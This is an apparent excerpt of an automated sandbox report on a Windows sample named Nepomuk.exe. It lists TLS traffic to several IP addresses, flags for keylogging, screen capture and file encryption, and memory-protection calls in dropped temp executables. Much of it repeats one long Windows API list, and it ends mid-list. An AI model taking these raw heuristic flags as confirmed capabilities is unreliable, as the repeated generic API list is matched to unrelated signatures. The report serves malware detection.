                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49718 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.4:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49729 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358D210 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,0_2_0358D210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionality to encrypt and move a file in one function
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015B0000 NtAllocateVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,NtProtectVirtualMemory,0_2_015B0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_018D0000 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,7_2_018D0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_032C0000 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,10_2_032C0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 13_2_012E0000 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,13_2_012E0000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610: CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNativ0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,